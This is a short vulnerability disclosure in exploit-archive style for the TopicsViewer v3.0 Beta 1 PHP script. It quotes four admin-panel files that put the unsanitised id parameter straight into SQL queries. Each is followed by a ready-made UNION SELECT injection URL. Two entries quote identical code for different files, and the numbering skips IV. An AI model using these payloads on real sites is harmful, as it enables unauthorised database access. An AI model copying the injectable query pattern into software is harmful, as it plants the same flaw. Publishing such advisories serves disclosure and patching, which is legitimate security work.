TopicsViewer v3.0 Beta 1 - Multiple Sql Injection Vulnerabilty
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.topicsviewer.com/
####################################################################
Multiple Sql Injection
======================
VULNERABILITY
##############
[I] /admincp/edit_block.php (line 46-48)
$sql_b_e = "select * from blocks where b_id = $_GET[id] ";
$result_b_e = @mysql_query ($sql_b_e);
$block = @mysql_fetch_array ($result_b_e);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_block.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10
VULNERABILITY
##############
[II] /admincp/edit_cat.php (line 77-79)
$sql = "select * from cat where c_id = $_GET[id]";
$result = @mysql_query ($sql);
$cat= @mysql_fetch_array ($result);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_cat.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8
VULNERABILITY
##############
[III] /admincp/edit_note.php (line 77-79)
$sql = "select * from cat where c_id = $_GET[id]";
$result = @mysql_query ($sql);
$cat= @mysql_fetch_array ($result);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_note.php?id=1+and+1=2+union+select+1,version(),3,4,5
VULNERABILITY
##############
[V] /admincp/rmv_topic.php (line 46-47)
$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;";
$result = @mysql_query ($sql);
#########
EXPLOIT
#########
localhost/Path/admincp/rmv_topic.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14
####################################################################